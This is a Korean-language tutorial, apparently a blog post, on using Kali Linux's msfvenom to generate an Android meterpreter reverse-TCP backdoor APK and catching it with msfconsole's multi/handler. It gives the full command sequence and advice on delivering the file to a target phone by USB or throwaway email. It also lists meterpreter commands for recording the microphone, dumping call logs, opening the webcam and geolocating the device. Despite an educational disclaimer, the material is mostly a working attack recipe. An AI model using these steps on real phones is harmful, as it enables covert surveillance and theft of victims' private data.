Computer >> 컴퓨터 >  >> 시스템 >> Linux

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

안드로이드 스마트폰은 대부분의 상용 IoT 기기로 이어지는 관문 역할을 합니다. 네스트(Nest) 연기 감지기는 전용 안드로이드 앱으로 관리하고, 네스트 온도조절기로 실내 온도를 조절할 수 있습니다. 스마트 도어락, 영상 도어벨 등 거의 모든 스마트 기기가 알렉사(Alexa)나 다른 마스터 앱을 통해 제어되죠. 그렇다면 만약 누군가 이러한 안드로이드 폰에 원격으로 접근한다면 어떻게 될까요? 불가능하다고 생각하시나요? 이번 글에서는 Kali Linux의 "메타스플로잇(Metasploit)"을 활용해 안드로이드 폰에 백도어 진입 경로를 만드는 기본적인 시연 과정을 소개합니다.

참고: 본 튜토리얼은 보안 연구자와 취미 개발자를 위한 학습 목적의 콘텐츠입니다. 상대방의 동의 없이 타인의 휴대폰을 해킹하는 행위는 절대 권장하지 않습니다.

배경 지식

Kali Linux 작업을 시작하기 전에 먼저 콘솔 터미널 사용법에 익숙해져야 합니다.

Kali Linux에는 특정 기기의 펌웨어나 운영체제를 대상으로 하는 다양한 보안 도구가 기본적으로 탑재되어 있습니다.

여기서는 "MSFVenom"이라는 대표적인 도구를 사용해 안드로이드 폰에 바이러스를 심는 과정을 다룹니다. MSFVenom은 사용자가 선택한 옵션에 따라 여러 종류의 페이로드를 생성할 수 있으며, Windows, Android, OpenBSD, Solaris, JAVA, PHP, 게임 하드웨어 등 폭넓은 플랫폼에서 작동합니다.

안드로이드 메타스플로잇 실행하기

다음 단계는 Kali Linux 시스템에서 MSFVenom을 사용하는 과정을 보여줍니다.

터미널을 열고 아래 명령어를 입력합니다.

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP주소 LPORT=포트번호 R > /root/저장경로/hackand.apk

여기서 페이로드는 "Meterpreter"라는 익스플로잇 확장 모듈을 통해 실행됩니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

리스너 호스트의 IP 주소를 확인하려면 새 콘솔 터미널을 열고 ifconfig를 입력합니다. 일반적으로 트로이목마, 익스플로잇, 바이러스에는 4444번 포트가 할당됩니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

IP 주소를 확인했다면 이전 화면으로 돌아가 해당 정보를 입력합니다.

"hackand.apk" 파일은 데스크톱에 저장되며, 안드로이드 폰에 사용할 핵심 백도어 익스플로잇입니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

다음 단계에서는 Kali Linux에서 널리 쓰이는 침투 테스트 도구인 "msfconsole"을 실행합니다. 이를 위해 service postgresql start 명령어를 입력한 뒤 msfconsole을 입력합니다. PostgreSQL은 콘솔 데이터가 저장되는 데이터베이스를 의미합니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

침투 도구가 준비되면 나머지 익스플로잇을 실행할 수 있습니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

다음으로 "multi-handler"라는 실행 모듈을 사용합니다.

use multi/handler

아래 이미지를 참고해 익스플로잇과 콘솔을 연결합니다. 이때 동일한 IP 주소와 포트 번호를 사용합니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

다음 단계에서는 간단한 exploit 명령어로 msfvenom 익스플로잇을 실행하고 초기화합니다. 이제 공격 대상이 될 안드로이드 폰을 찾아야 합니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

Kali Linux 터미널과 안드로이드 폰 연결하기

앞서 생성한 hackand.apk 파일의 크기는 10KB 정도로 매우 작습니다. 이 파일을 대상 폰에 전달할 방법을 찾아야 하며, USB 또는 임시 이메일 서비스를 통해 악성 파일을 전송할 수 있습니다.

일반적으로 Gmail이나 Yahoo 같은 웹메일 서비스는 바이러스에 감염된 파일의 전송을 차단합니다.

안드로이드는 소프트웨어 설치 전 경고를 표시하지만, "위험을 무시하고 설치" 버튼만 누르면 20초 이내에 설치가 완료됩니다. 따라서 휴대폰이 잠금 해제 상태라면 위협이 상당히 심각해질 수 있습니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

위와 같이 저장소 내용 수정, 절전 모드 방지, Wi-Fi 연결 및 해제, 배경화면 변경 등 휴대폰에 다양한 피해를 줄 수 있습니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

APK 파일이 설치되면 휴대폰 안에서 교묘하게 위장되어 존재감을 숨길 수 있습니다.

Kali Linux로 안드로이드 스마트폰에 접근하는 방법

이제 Kali Linux 터미널에서 다음과 같은 명령어들을 사용해 폰을 제어할 수 있습니다. 전체 명령어 목록은 meterpreterhelp 옵션에서 확인할 수 있으므로 굳이 외울 필요는 없습니다.

  • record_mic: 마이크 녹음
  • dump_calllog: 통화 기록 가져오기
  • webcam_chat: 영상 채팅 시작
  • geolocate: 휴대폰 현재 위치 확인

참고로 최신 안드로이드 폰 대부분은 이러한 악성 앱의 설치를 자체적으로 차단합니다. 따라서 이 익스플로잇은 주로 구형 안드로이드 모델에서만 작동합니다.

마치며

이번 튜토리얼에서는 Kali Linux를 활용해 안드로이드 스마트폰에 접근하는 기본적인 방법을 살펴보았습니다. 비교적 간단한 익스플로잇이지만, IoT 보안 측면에서 시사하는 바가 큽니다.

Kali Linux 익스플로잇에 대해 어떻게 생각하시나요? 휴대폰 보안에 더 신경 쓰게 되셨나요? 댓글로 여러분의 의견을 남겨주세요.